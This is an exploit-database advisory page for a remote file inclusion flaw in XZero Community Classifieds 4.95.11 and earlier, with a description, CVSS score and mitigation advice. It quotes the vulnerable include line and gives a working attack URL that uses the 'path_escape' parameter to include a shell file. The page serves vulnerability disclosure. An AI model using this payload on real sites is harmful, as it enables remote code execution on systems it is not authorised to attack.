header-logo
Suggest Exploit
vendor:
XZero Community Classifieds
by:
Kw3rLn
7.5
CVSS
HIGH
Remote File Inclusion
CWE
Product Name: XZero Community Classifieds
Affected Version From: 4.95.11 and earlier
Affected Version To: 4.95.11
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

XZero Community Classifieds <= v4.95.11 Remote File Inclusion

This vulnerability allows an attacker to include remote files in the XZero Community Classifieds version 4.95.11 and earlier. By manipulating the 'path_escape' parameter in the 'config.inc.php' file, an attacker can include arbitrary files from a remote server. This can lead to remote code execution or other malicious activities.

Mitigation:

Update to a version of XZero Community Classifieds that is not affected by this vulnerability. Remove any unnecessary file inclusion functionality from the application.
Source

Exploit-DB raw data:

# XZero Community Classifieds  <= v4.95.11 Remote File Inclusion
# linK : http://www.xzeroscripts.com
# download: http://rapidshare.com/files/66809648/XZCl4.95.11.rar
#
# (c)od3d and f0unded by Kw3rLn from Romanian Security Team a.K.A http://rstzone.org
#
# we have in config.inc.php:
#    line303:    require_once("{$path_escape}ipblock.inc.php");
#
# link: http://site.com/config.inc.php?path_escape=shell.txt%00
#
# meri crismas...hohoho
# greetz to all RST [rstzone.org] MEMBERZ !

# milw0rm.com [2007-12-26]

Navigation

Suggest Exploit

Services By CQR

cqrsecured